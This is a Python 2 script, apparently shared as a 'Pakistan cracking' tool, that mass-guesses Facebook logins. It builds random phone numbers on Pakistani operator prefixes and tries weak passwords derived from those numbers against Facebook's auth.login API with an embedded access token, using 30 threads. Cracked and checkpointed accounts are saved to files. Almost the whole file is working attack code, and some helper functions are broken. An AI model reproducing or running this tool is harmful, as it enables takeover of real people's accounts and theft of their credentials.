import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 Star-boy.py')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent', 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; SM-G930F Build/R16NW) [FBAN/FB4A;FBAV/195.0.0.35.99;FBBV/128710103;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/129521611;FBCR/2degrees;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-J250G;FBSV/7.1.1;FBOP/19;FBCA/armeabi-v7a:armeabi;]')]
def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
banner = """
\033[1;93m _______  _____       _______ _____
\033[1;94m |______ |     |      |  |  |   |  
\033[1;95m ______| |_____|      |  |  | __|__
                                   
\033[0;93m===============================================
  \033[0;96mDEVOLPER ---- SOMI STAR BOY
  \033[0;92mWHATSAAP ---- +923455453538\033[1;91m[DONT CALL]
  \033[1;94mFACEBOOK ---- Somi Awan \033[0;91m[JUST MESSAGE]
\033[0;93m===============================================
"""
banner1 = """
\033[0;93m===============================================
\033[1;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[0;93m===============================================
\033[1;91m[\xe2\x97\x8f]\033[1;96m00, 01, 02, 03, 04,
\033[1;91m[\xe2\x97\x8f]\033[1;93m05, 06, 07, 08, 09,
\033[0;93m===============================================
\033[1;97mTELENORE CODE HERE\033[1;0m
\033[0;93m===============================================
\033[1;91m[\xe2\x97\x8f]\033[1;96m40, 41, 42, 43, 44,
\033[1;91m[\xe2\x97\x8f]\033[1;93m45, 46, 47 ,48 ,49,
\033[0;93m===============================================
\033[1;97mWARID CODE HERE\033[1;0m
\033[0;93m===============================================
\033[1;91m[\xe2\x97\x8f]\033[1;96m20, 21, 22, 23,
\033[1;91m[\xe2\x97\x8f]\033[1;93m24, ??, ??, ??,
\033[0;93m===============================================
\033[1;97mUFONE CODE HERE\033[1;0m
\033[0;93m===============================================
\033[1;91m[\xe2\x97\x8f]\033[1;96m31, 32, 33, 34,
\033[1;91m[\xe2\x97\x8f]\033[1;93m35, 36, 37, ??,
\033[0;93m===============================================
\033[1;97mZONG CODE HERE\033[1;0m
\033[0;93m===============================================
\033[1;91m[\xe2\x97\x8f]\033[1;96m10, 11, 12, 13,
\033[1;91m[\xe2\x97\x8f]\033[1;93m14, 15, 16, 17,
\033[0;93m===============================================
"""

##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def Pakistan():
    os.system('clear')
    print banner
    psb('\033[1;33m[\033[1;92m01\033[1;36m] \033[1;37mPAKISTAN CRACKING')
    time.sleep(0.05)
    print
    psb('\033[1;33m[\033[1;92m00\033[1;36m] \033[1;37mCLOSE')
    time.sleep(0.05)
    pilih_Pakistan()
def pilih_Pakistan():
    peak = raw_input("\n\033[1;95m|---->: \033[1;93m")
    if peak =="":
        print "\x1b[1;97mFill In Correctly"
        pilih_login()
    elif peak =="1":
    	os.system("clear")
        print banner
        print banner1
        try:
            c = raw_input("\033[1;97m|----> : ")
            k = "03"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
    
    elif peak =="00":
        Pakistan()
    else:
        print '[!] Fill In Correctly'
        pilih_Pakistan()
    print 47* '\033[1;97m_'
    print
    xxx = str(len(id))
    psb('\033[1;97m[\033[1;93m+\033[1;97m] \033[0;92mTOTAL ACCOUNT NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[0;93m PLEASE WAIT,PROCESS IS START..')
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;91m!\033[1;97m] \033[0;91mTO STOP THIS PROCESS PRESS \033[1;91mCtrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m_'
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m[ACTIVE ACCOUNT \033[1;92mOPEN NOW]\n\033[1;97m[P-NUMBER]\033[0;96m  ' + k + c + user + '\n\033[1;97m[PASSWORD]\033[0;95m  ' + pass1 + '\n\033[0;90m==============================================='
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m[OHH NO CP \033[1;91mOPEN AFTAR 3 DAYS]\n\033[1;97m[P-NUMBER]\033[0;93m  ' + k + c + user + '\n\033[1;97m[PASSWORD]\033[0;96m  ' + pass1 + '\n\033[0;90m==============================================='
                    cps = open('save/checkproint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m[ACTIVE ACCOUNT \033[1;92mOPEN NOW]\n\033[1;97m[P-NUMBER]\033[0;96m  ' + k + c + user + '\n\033[1;97m[PASSWORD]\033[0;90m  ' + pass2 + '\n\033[0;95m==============================================='
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else: 
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m[OHH NO CP \033[1;91mOPEN AFTAR 3 DAYS]\n\033[1;97m[P-NUMBER]\033[0;93m  ' + k + c + user + '\n\033[1;97m[PASSWORD]\033[0;96m  ' + pass2 + '\n\033[0;90m==============================================='
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        
                              

        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 47* '\033[1;91m-'
    print '\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;93m PROCESS COMPLETE..'
    print '\033[1;97m[\033[1;97m+\033[1;97m]\033[1;96 mTOTAL OPEN NOW / OHH NO CP: '+str(len(oks))+'/'+str(len(cpb))
    print 47* '_'
    
    
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;92m]")
    Pakistan() 
          

          

if __name__ == '__main__':
    Pakistan()

      
